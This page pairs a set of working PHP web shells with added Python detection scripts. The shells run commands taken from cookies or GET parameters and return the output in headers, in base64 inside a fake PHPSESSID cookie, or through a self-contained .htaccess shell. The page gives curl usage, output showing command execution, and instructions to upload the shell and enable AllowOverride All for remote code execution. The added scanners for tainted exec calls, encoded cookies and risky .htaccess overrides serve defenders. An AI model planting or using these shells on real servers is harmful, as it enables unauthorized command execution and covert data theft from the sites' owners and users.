1 -> Using a cookie
<?php @header('Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?>
Example:
curl 'http://target/cookie.php' -b 'cmd=id' -A 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3' -e 'http://www.google.com/'
2 -> Using HTTP headers
<?php @header('Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?>
Example (the -v flag makes curl print the response headers):
curl -v 'http://target/headers.php' -b 'cmd=id' -A 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3' -e 'http://www.google.com/'
Output:
HTTP/1.1 200 OK
Date: Wed, 06 Jun 2011 11:23:18 GMT
Server: Apache DAV/2 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Hidden-Field: uid=20(nobody) gid=20(nobody) groups=20(nobody)
Content-Type: text/html
3 -> Base64 encoding of the output
<?php if(isset($_COOKIE)) @header('Set-Cookie: PHPSESSID='.@base64_encode(@exec($_COOKIE ['cmd']))); echo "<p>pown</p>"; ?>
Example (-D shellog writes the response headers to the file shellog):
curl -v 'http://target/base64.php' -b 'cmd=id' -A 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3' -e 'http://www.google.com/' -D shellog
Output:
HTTP/1.1 200 OK
Date: Wed, 06 Jun 2011 11:23:18 GMT
Server: Apache DAV/2 PHP/5.3.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=dWlkPTcwKF93d3cpIGdpZD03MChfd3d3KSBncm91cHM9NzAoX3d3dyksMTAxKGNvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjEpLDYxKGxvY2FsYWNjb3VudHMpLDEyKGV2ZXJ5b25lKSw0MDIoY29tLmFwcGxlLnNoYXJlcG9pbnQuZ3JvdXAuMyksMTAyKGNvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjIp
Content-Length: 12
Content-Type: text/html
Offline Base64 decode:
shell$ python -c 'import base64, sys; print base64.decodestring(sys.argv[1]);' `cat shellog|grep ^Set-Cookie|cut -d '=' -f 2`
uid=20(nobody) gid=20(nobody) groups=20(nobody)
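The three one-liners above share two traits a defender can key on: the command is taken straight from a request superglobal ($_COOKIE, $_GET), and its output leaves in a response header or a cookie rather than in the body, so body-based inspection never sees it. The following Python is an added example written for this page, not code from the original post: it scans PHP source for exec-family calls fed from request input and for header() calls that embed such a call, and it checks a captured Set-Cookie line for a PHPSESSID value that is really base64-encoded text. The sample PHP sources are the page's own shells plus one constructed clean file; the cookie value is the one in the output above with its line-wrap spaces removed.

```python
"""Triage helpers for the header/cookie web shells quoted on this page.

scan_php_source()           flags exec-family calls whose argument comes from a
                            request superglobal, and header() calls that embed
                            such a call (command output smuggled into a header).
suspicious_session_cookie() flags a Set-Cookie PHPSESSID value that is really
                            base64-encoded text rather than a session id.
"""
import base64
import binascii
import re

EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
# Request-controlled superglobals a one-line shell reads its command from.
INPUT_SOURCES = ("$_COOKIE", "$_GET", "$_POST", "$_REQUEST", "$_SERVER")
# Optional '@' error suppression is typical of these shells, hence the leading @?.
EXEC_CALL = re.compile(r"@?\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I)

# Sample inputs: the first three are the page's own one-liners; clean.php is a
# constructed file that calls header() and reads $_GET without running anything.
SAMPLES = {
    "cookie.php": "<?php @header('Hidden-Field: '.@exec($_COOKIE['cmd'])); echo \"<p>hello</p>\"; ?>",
    "base64.php": "<?php if(isset($_COOKIE)) @header('Set-Cookie: PHPSESSID='"
                  ".@base64_encode(@exec($_COOKIE ['cmd']))); echo \"<p>pown</p>\"; ?>",
    "htaccess_shell": "<?php echo \"\\n\";passthru($_GET['c'].\" 2>&1\"); ?>",
    "clean.php": "<?php header('Content-Type: text/html'); echo htmlspecialchars($_GET['name']); ?>",
}

# The Set-Cookie line from the page's base64 example (line-wrap spaces removed).
PAGE_SET_COOKIE = ("Set-Cookie: PHPSESSID="
                   "dWlkPTcwKF93d3cpIGdpZD03MChfd3d3KSBncm91cHM9NzAoX3d3dyksMTAxKG"
                   "NvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjEpLDYxKGxvY2FsYWNjb3VudHMpLDEyKGV2Z"
                   "XJ5b25lKSw0MDIoY29tLmFwcGxlLnNoYXJlcG9pbnQuZ3JvdXAuMyksMTAyKGNvbS5hcHBsZS"
                   "5zaGFyZXBvaW50Lmdyb3VwLjIp")


def _call_args(src, open_paren):
    """Return the argument text of the call whose '(' is at open_paren,
    honouring nested parentheses; None if the call is unbalanced."""
    depth = 0
    for i in range(open_paren, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_paren + 1:i]
    return None


def scan_php_source(src):
    """Return a list of (severity, message) findings for one PHP source string."""
    findings = []
    for m in EXEC_CALL.finditer(src):
        args = _call_args(src, m.end() - 1)
        if args is None:
            continue
        tainted = [s for s in INPUT_SOURCES if s in args]
        if tainted:
            findings.append(("high", "%s() runs a command taken from %s"
                             % (m.group(1), ", ".join(tainted))))
        else:
            findings.append(("medium", "%s() call present" % m.group(1)))
    # header() whose argument contains an exec-family call: output exfiltrated
    # in a response header or Set-Cookie instead of the body.
    for m in re.finditer(r"\bheader\s*\(", src, re.I):
        args = _call_args(src, m.end() - 1)
        if args and EXEC_CALL.search(args):
            findings.append(("high", "command output written into a response header"))
    return findings


def suspicious_session_cookie(set_cookie_header):
    """Heuristic check of one Set-Cookie line. A real PHP session id is a hash,
    so base64-decoding it yields binary noise; a value that decodes to mostly
    printable ASCII is carrying data. Returns (is_suspicious, reason)."""
    m = re.search(r"PHPSESSID=([^;\s]+)", set_cookie_header)
    if not m:
        return False, "no PHPSESSID cookie"
    value = m.group(1)
    padded = value + "=" * (-len(value) % 4)  # tolerate stripped '=' padding
    try:
        decoded = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return False, "value is not base64"
    if len(decoded) < 8:
        return False, "too short to be encoded output"
    printable = sum(0x20 <= b < 0x7F for b in decoded) / len(decoded)
    if printable >= 0.9:
        text = decoded.decode("ascii", errors="replace")
        return True, "base64 decodes to text: %r" % text[:40]
    return False, "decodes to binary, consistent with a hashed session id"


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, scan_php_source(src))
    print(suspicious_session_cookie(PAGE_SET_COOKIE))
```

The cookie check deliberately decodes rather than matching on alphabet: a hex or base-32 session id is itself valid base64, so only the printable ratio of the decoded bytes separates an `id`-style string from a real hash. Run the source scan against the web root and any `.htaccess` files together, since the fourth variant below puts the same passthru() call in a file most PHP-only scans skip.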
4 -> With .htaccess
# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
Order allow,deny
Allow from all
# Make .htaccess file be interpreted as php file. This occurs after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ######
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
###### LLEHS ######
Simply upload the preferred shell as a .htaccess file and then visit it via the URL http://domain.tld/path/.htaccess?c=command for remote code execution.
The directory must allow .htaccess overrides in the Apache configuration:
nano /etc/httpd/conf/httpd.conf
<Directory /var/www/>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Order allow,deny
    allow from all
</Directory>
Then restart the Apache web server. (You can modify the code to suit your setup.)
More to see here: https://github.com/wireghoul/htshells
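The .htaccess variant works only because the directory permits overrides, and it leaves two artifacts that are easy to audit for: an .htaccess that reopens web access to itself and remaps its own extension to the PHP handler, and an httpd.conf <Directory> block with AllowOverride All. The Python below is an added example written for this page, not code from htshells or the original post. The .htaccess shell and the <Directory> block are the ones quoted above; the benign .htaccess and the hardened block are constructed for comparison.

```python
"""Audit helpers for the .htaccess web shell technique described above.

htaccess_findings()       reasons an .htaccess looks like a self-contained shell
allowoverride_findings()  <Directory> blocks whose AllowOverride would let such
                          an .htaccess take effect
"""
import re

# The self-contained .htaccess shell quoted on this page (htshells), comments trimmed.
HTACCESS_SHELL = """\
# Override default deny rule to make .htaccess file accessible over web
Order allow,deny
Allow from all
# Make .htaccess file be interpreted as php file.
AddType application/x-httpd-php .htaccess
###### SHELL ######
<?php echo "\\n";passthru($_GET['c']." 2>&1"); ?>
###### LLEHS ######
"""

# Constructed sample: an ordinary rewrite-only .htaccess.
HTACCESS_BENIGN = """\
RewriteEngine On
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
"""

# The <Directory> block the page tells the reader to add to httpd.conf.
HTTPD_CONF_PAGE = """\
<Directory /var/www/>
    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Order allow,deny
    allow from all
</Directory>
"""

# Constructed hardened equivalent: no per-directory overrides at all.
HTTPD_CONF_HARDENED = """\
<Directory /var/www/>
    Options FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
"""


def htaccess_findings(text):
    """Return the reasons an .htaccess looks like a self-contained web shell."""
    findings = []
    # Apache's stock config denies .ht* files; these lines undo that (2.2 and 2.4 syntax).
    if re.search(r"^\s*(Allow\s+from\s+all|Require\s+all\s+granted)\s*$", text, re.I | re.M):
        findings.append("grants web access to the .htaccess file itself")
    # AddType/AddHandler pointing the .htaccess extension at a PHP handler.
    if re.search(r"^\s*(AddType|AddHandler)\s+\S*php\S*\s+.*\.htaccess", text, re.I | re.M):
        findings.append("maps the .htaccess extension to the PHP handler")
    if re.search(r"<\?(php|=)", text, re.I):
        findings.append("contains PHP code")
    return findings


def allowoverride_findings(conf):
    """Return (directory, value) for each <Directory> block whose AllowOverride
    permits an .htaccess to change handlers: 'All', or any list naming FileInfo
    (the override class AddType belongs to)."""
    risky = []
    for block in re.finditer(r'<Directory\s+"?([^">]+?)"?\s*>(.*?)</Directory>',
                             conf, re.S | re.I):
        path, body = block.group(1), block.group(2)
        m = re.search(r"^\s*AllowOverride\s+(.+?)\s*$", body, re.I | re.M)
        if not m:
            continue  # not set here; inherited from the enclosing <Directory>
        value = m.group(1)
        tokens = value.lower().split()
        if "all" in tokens or "fileinfo" in tokens:
            risky.append((path, value))
    return risky


if __name__ == "__main__":
    print(htaccess_findings(HTACCESS_SHELL))
    print(htaccess_findings(HTACCESS_BENIGN))
    print(allowoverride_findings(HTTPD_CONF_PAGE))
    print(allowoverride_findings(HTTPD_CONF_HARDENED))
```

Both checks are cheap enough to run from a file-integrity job or a deployment gate. The second one is the preventive control: with AllowOverride None (the Apache default since 2.3.9) the AddType line in the uploaded file is ignored and the stock <Files ".ht*"> deny rule keeps the file unreadable, so the upload alone does not give code execution.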